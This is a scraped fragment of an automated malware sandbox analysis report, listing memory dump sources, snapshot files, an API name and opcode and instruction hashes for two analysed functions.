                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: 2d2d62545ea4f5ce415420efed72a84487851dfde4e93cd4ef4c387d9bfd9ca9
                                                                                                                      • Instruction ID: 38a91d80e6d4f5c3976a0142ca381142e059391d170cea53ea9e9e080b6d6139
                                                                                                                      • Opcode Fuzzy Hash: 2d2d62545ea4f5ce415420efed72a84487851dfde4e93cd4ef4c387d9bfd9ca9
                                                                                                                      • Instruction Fuzzy Hash: 52C08C7B30C2408EE009F0F2B2256EE2BA0C9E6330371CCB3C003CB213A20652DE3026

                                                                                                                      Non-executed Functions

                                                                                                                      Function 04BB06B2 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494335345.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bb0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :k7e
                                                                                                                      • API String ID: 0-1469044475
                                                                                                                      • Opcode ID: 254808a0874ba01b7e4fc60f0e160dd5d8f70dc8e27c5ee8880257d851442831
                                                                                                                      • Instruction ID: efff6f58deadd34fb5da71bfe29c32fb0a8fc329aabf5506290b20dbbea1cce0
                                                                                                                      • Opcode Fuzzy Hash: 254808a0874ba01b7e4fc60f0e160dd5d8f70dc8e27c5ee8880257d851442831
                                                                                                                      • Instruction Fuzzy Hash: D6214B9730C250BE2143709A5B915FBAF1AF6E733033042E6E8D39A741B6D41E55B5E1